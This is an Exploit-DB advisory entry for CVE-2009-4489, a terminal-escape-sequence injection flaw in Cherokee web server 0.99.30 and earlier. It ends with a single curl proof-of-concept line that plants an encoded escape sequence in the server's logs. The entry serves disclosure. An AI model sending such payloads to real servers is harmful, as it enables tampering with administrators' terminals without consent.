Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection Vulnerability

2010-01-11T00:00:00
ID EDB-ID:33501
Type exploitdb
Reporter evilaliv3
Modified 2010-01-11T00:00:00

Description

Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection Vulnerability. CVE-2009-4489. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/37715/info

Cherokee is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.

Attackers can exploit this issue to execute arbitrary commands in a terminal.

Cherokee 0.99.30 and prior are vulnerable.

curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a